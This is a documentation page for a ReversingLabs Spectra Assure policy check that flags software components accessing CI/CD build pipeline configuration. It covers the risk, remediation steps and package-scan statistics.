TH16131
Detected presence of software components that can access sensitive build pipeline configuration.
| priority | CI/CD status | severity | effort | SAFE level | SAFE assessment |
|---|---|---|---|---|---|
 | pass | high | high | None | None |
About the issueโ
Software components sometimes need to interact with sensitive parts of the runtime environment, often requiring privileged access to accomplish a task. Build pipeline configuration includes high-value information such as CI/CD platform secrets and tokens, pipeline definition files and runner configuration, build-time environment variables containing signing keys or deploy credentials, and artifact registry and package publishing credentials. That information is used by continuous integration and delivery systems. Attackers often abuse access to build pipeline configuration to harvest secrets from build environments, which can later be exfiltrated to attacker-controlled infrastructure and used to tamper with software releases or publish malicious artifacts under trusted identities. While the presence of code that accesses build pipeline configuration does not necessarily imply malicious intent, all of its uses in a software package should be documented and approved. Only select software components should consider using functions that read build pipeline configuration. One example of acceptable use for such functions is release tooling that reads publishing credentials to push artifacts.
How to resolve the issueโ
- Investigate reported detections as indicators of software tampering.
- Consult Mitre ATT&CK documentation: T1072 - Software Deployment Tools.
- Consider rewriting the flagged code without using the marked behaviors.
Incidence statisticsโ
ReversingLabs periodically collects and analyzes the contents of popular software package repositories for threat research purposes. Analysis results are used to calculate incidence statistics for issues (policy violations) that Spectra Assure can detect in software packages.
This section is updated when new data becomes available.
Total amount of packages analyzed
- Linux: 562K
- NPM: 5.12M
- Nuget: 735K
- PS Gallery: 17K
- PyPi: 838K
- RubyGems: 203K
- VS Code: 113K
- Windows: 3.7K
Recommended readingโ
- Software Deployment Tools (External resource)